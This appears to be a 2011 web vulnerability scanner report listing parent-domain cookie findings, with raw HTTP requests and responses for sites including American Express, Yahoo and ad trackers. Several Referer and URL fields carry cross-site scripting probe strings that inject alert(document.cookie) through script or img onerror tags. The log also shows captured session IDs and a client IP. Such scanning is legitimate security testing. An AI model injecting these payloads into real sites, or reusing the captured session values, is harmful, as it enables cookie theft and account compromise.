HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.microsoft.com/en-us/cloud/default.aspx P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001297008076-9188004; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=3E2F68EB98BD48E59A5080FE6FA42FD0; expires=Thursday, 25-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=129ed/39a8; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=b32673d/39a8/ff735ae/129ed/4d4ec5cc; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 06 Feb 2011 16:01:16 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gcs/cards/ HTTP/1.1 Host: corp.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:50:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-cookie: SaneID=173.193.214.243-25629229680629; path=/; expires=Sat, 05-Feb-16 21:50:31 GMT; domain=.americanexpress.com X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=mzrsjm55ziqng1au1tmzi545; path=/ Cache-Control: public, max-age=90 Expires: Sat, 05 Feb 2011 21:52:01 GMT Last-Modified: Sat, 05 Feb 2011 21:50:31 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 39860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gcs/cards/land/compare.aspx HTTP/1.1 Host: corp.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:50:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-cookie: SaneID=173.193.214.243--17320946710097; path=/; expires=Sat, 05-Feb-16 21:50:33 GMT; domain=.americanexpress.com X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=q0nfjsmlal0n1l45z4jzte55; path=/ Cache-Control: public, max-age=900 Expires: Sat, 05 Feb 2011 22:05:33 GMT Last-Modified: Sat, 05 Feb 2011 21:50:33 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 40724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gcs/travel/us/ HTTP/1.1 Host: corp.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Length: 191 Content-Type: text/html Content-Location: http://corp.americanexpress.com/gcs/travel/us/default.htm Last-Modified: Tue, 25 Nov 2008 02:00:23 GMT Accept-Ranges: bytes ETag: "78d8fc93a14ec91:2144" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-cookie: SaneID=173.193.214.243--17320946090159; path=/; expires=Sat, 05-Feb-16 21:50:33 GMT; domain=.americanexpress.com Date: Sat, 05 Feb 2011 21:50:32 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head> <meta http-equiv="refresh" content="0;url=/gcs/travel/"/> </head> <body></body> </html>
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
FTID=1DJSvH2tlD0r; path=/; expires=Sun, 05 Feb 2012 21:00:00 GMT; domain=.yadro.ru
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hit?rhttp%3A//burp/show/0;s1920*1200*16;uhttp%3A//driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload72968%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%28document.cookie%29%253Ea36cb148e37;0.6545794615522027 HTTP/1.1 Host: counter.yadro.ru Proxy-Connection: keep-alive Referer: http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload72968%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ea36cb148e37 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r/dd/id/L21rdC8zL2NpZC8xNzk2NjkwL3QvMg/cat/267859374-193167493/qry/ HTTP/1.1 Host: d.mediabrandsww.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=2402274690891816433
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=2402274690891816433; Domain=.mediabrandsww.com; Expires=Fri, 05-Aug-2011 13:22:28 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Sun, 06 Feb 2011 13:22:27 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /post HTTP/1.1 Host: del.icio.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 06 Feb 2011 16:01:16 GMT Set-Cookie: BX=e3vc5bl6kthec&b=3&s=cu; expires=Tue, 06-Feb-2013 20:00:00 GMT; path=/; domain=.icio.us P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Location: http://www.delicious.com/post Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 162
The document has moved <A HREF="http://www.delicious.com/post">here</A>.<P> <!-- fe01.web.del.ac4.yahoo.net uncompressed/chunked Sun Feb 6 16:01:16 UTC 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/ HTTP/1.1 Host: developer.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:04:01 GMT Set-Cookie: B=bgfp9s16kthjh&b=3&s=lg; expires=Tue, 06-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 29605
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/license.html HTTP/1.1 Host: developer.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:04:01 GMT Set-Cookie: B=akvfcul6kthjh&b=3&s=mo; expires=Tue, 06-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 22176
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /plugins/ HTTP/1.1 Host: developers.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Location: http://developers.facebook.com/docs/plugins P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=HN5NTXcKjZrFIQ37M294VK4z; expires=Mon, 04-Feb-2013 23:32:44 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=ScgJn; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:32:44 GMT Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /al.asp?ts=20110205214821&adid=126828%2C0%2C3841%2C121057%2C0%2C0%2C0&cc=us&di=29848192%2C29951564%2C29471372%2C29167950%2C30018856%2C29875388%2C29651480&hk=1&ipid=18400&mh=57f4673cf4ad79544ac753cf0dd004c8&pid=2%2C2%2C2%2C2%2C2%2C2%2C2&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&pvu=4E02CE94902A497D8EBF5C1016534811&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0%2C0&kp=430%2C971%3B168%2C1189%3B238%2C1238%3B337%2C1717%3B479%2C2214%3B509%2C2742%3B346%2C4628%3B&prf=ll%3A2635%7Cintl%3A2738%7Cpreprochrome%3A2%7Cgetconchrome%3A251%7Ccontint%3A3224%7Ccontl%3A6220%7Cadvint%3A351%7Cadvl%3A6571%7Ctl%3A6773&jscallback=$iTXT.js.callback19 HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 21:48:02 GMT; Path=/ Content-Type: text/javascript Content-Length: 39 Date: Sat, 05 Feb 2011 21:48:01 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intellitxt/front.asp?ipid=18400 HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AIAAAEt7DS2iwA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 21:47:53 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 21:47:53 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 05 Feb 2011 21:47:53 GMT Connection: close Content-Length: 10683
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /eas?camp=31618;cre=mu;js=y;target=_blank;ord=[timestamp];EASClick= HTTP/1.1 Host: eas.statcamp.net Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quant.js HTTP/1.1 Host: edge.quantserve.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close ETag: "18382:E0-149392971-1296944707933" Vary: Accept-Encoding Last-Modified: Sat, 05-Feb-2011 22:25:07 GMT Content-Type: application/x-javascript Set-Cookie: mc=4d4dce43-e3fa1-533c1-60d39; expires=Sat, 05-Feb-2021 22:25:07 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Sun, 06 Feb 2011 22:25:07 GMT Content-Length: 5265 Date: Sat, 05 Feb 2011 22:25:07 GMT Server: QS
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_tx7Cvctx7Dpeturx7Ex7Fetx7Fe=[CS]v4|0-0|4D4EC5CE[CE]; Expires=Fri, 5 Feb 2016 16:01:18 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/emgrelatedcontent/1/H.19.4/s23179186573252 HTTP/1.1 Host: enterprisemediagroup.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26A6AAA485161A8B-40000177E007F5AC|4D4EA057[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_jyx7Bskhyx7Bx7Dx7Ftwzytjyx7Bskhyx7Bx7D=[CS]v4|26A6B52B85011D42-6000010FC0072A22|4D4D6A14[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_maitcx7Cibx7Cx7Ech=[CS]v4|26A62673051D24FA-40000102A01BFE08|4D4C4CE1[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x60sqyabsqwx7Fx7Daax7Dfwaf=[CS]v4|26A6B50A85011110-6000010AA002E73C|4D4D6A14[CE]; s_vi_mx7Eqqsvax7Edtx7Fvyyrx7Bx7Eydx7Esre=[CS]v4|26A6AAA485161A8B-40000177E007F5AA|4D4D5548[CE]; s_vi=[CS]v1|26A7503405012723-40000106C0020AE2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_kxxwwupgxxbspbtx7Dxxx7Ft=[CS]v4|26A7502C850132CA-6000010CE0000D64|4D4EA057[CE];
Response
HTTP/1.1 302 Found Date: Sun, 06 Feb 2011 16:01:18 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_tx7Cvctx7Dpeturx7Ex7Fetx7Fe=[CS]v4|0-0|4D4EC5CE[CE]; Expires=Fri, 5 Feb 2016 16:01:18 GMT; Domain=.2o7.net; Path=/ Location: http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s23179186573252?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Sat, 05 Feb 2011 16:01:18 GMT Last-Modified: Mon, 07 Feb 2011 16:01:18 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www616 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_tx7Cvctx7Dpeturx7Ex7Fetx7Fe=[CS]v4|0-0|4D4EC5CF[CE]; Expires=Fri, 5 Feb 2016 16:01:19 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/emgrelatedcontent/1/H.19.4/s29905151680577 HTTP/1.1 Host: enterprisemediagroup.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26A6AAA485161A8B-40000177E007F5AC|4D4EA057[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_jyx7Bskhyx7Bx7Dx7Ftwzytjyx7Bskhyx7Bx7D=[CS]v4|26A6B52B85011D42-6000010FC0072A22|4D4D6A14[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_maitcx7Cibx7Cx7Ech=[CS]v4|26A62673051D24FA-40000102A01BFE08|4D4C4CE1[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x60sqyabsqwx7Fx7Daax7Dfwaf=[CS]v4|26A6B50A85011110-6000010AA002E73C|4D4D6A14[CE]; s_vi_mx7Eqqsvax7Edtx7Fvyyrx7Bx7Eydx7Esre=[CS]v4|26A6AAA485161A8B-40000177E007F5AA|4D4D5548[CE]; s_vi=[CS]v1|26A7503405012723-40000106C0020AE2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_kxxwwupgxxbspbtx7Dxxx7Ft=[CS]v4|26A7502C850132CA-6000010CE0000D64|4D4EA057[CE];
Response
HTTP/1.1 302 Found Date: Sun, 06 Feb 2011 16:01:19 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_tx7Cvctx7Dpeturx7Ex7Fetx7Fe=[CS]v4|0-0|4D4EC5CF[CE]; Expires=Fri, 5 Feb 2016 16:01:19 GMT; Domain=.2o7.net; Path=/ Location: http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s29905151680577?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Sat, 05 Feb 2011 16:01:19 GMT Last-Modified: Mon, 07 Feb 2011 16:01:19 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www492 Content-Length: 0 Content-Type: text/plain Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fb/a/mailverify HTTP/1.1 Host: feedburner.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=UTF-8 Date: Sat, 05 Feb 2011 23:32:44 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Set-Cookie: S=feedburner-control-panel=XBvt5onSLx9jPcXP90cfRA; Domain=.google.com; Path=/; HttpOnly Server: GSE Expires: Sat, 05 Feb 2011 23:32:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /add HTTP/1.1 Host: fusion.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/ig/add">he ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /group/jquery-dev/browse_thread/thread/36395b7ab510dd5d HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
hilton-portal=HHONORS; Domain=hilton.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_US/hh/home_index.do HTTP/1.1 Host: hhonors1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/corporations.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/global_splash.html HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Fri, 26 Nov 2010 10:10:41 GMT Server: IBM_HTTP_Server Content-Type: text/html Cache-Control: no-store Expires: Sat, 05 Feb 2011 21:50:49 GMT Date: Sat, 05 Feb 2011 21:50:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: bandwidthdetect=vhigh; expires=Mon, 07-Mar-2011 21:50:49 GMT; path=/; domain=.americanexpress.com Content-Length: 37032
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>American Express</TITLE><META http-equiv=Content-Type content="text/html; charset=windows-1252"> <STYLE type='text/css ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/mt_personal.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rs?id=55a98cbe3a9546199c35c06090cd400c&t=marketing HTTP/1.1 Host: i.w55c.net Proxy-Connection: keep-alive Referer: http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=aarp.thehartford.com,foxnews8.com,carinsuranceweb.com,geinterestplus.com,digestaqure.com&p=0.000700179100183313&url=http%3A%2F%2Fhomeappliance.manualsonline.com%2Fex%2Fmfg%2Fheadline%2Fm%2Fariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281%2Fd%2Ftype%2Fproduct_problem&cbb=0x5FAA34DC317211E0BEB038273F87B1CA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /px?bidder=13&seg=49740&qsdata=7431457a-2008-4af6-823b-5fab70668c12:4441692.10781187.8722&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fadv%3D95413%26t%3D2%26id%3D862779%26id%3D666786%26id%3D866803 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; 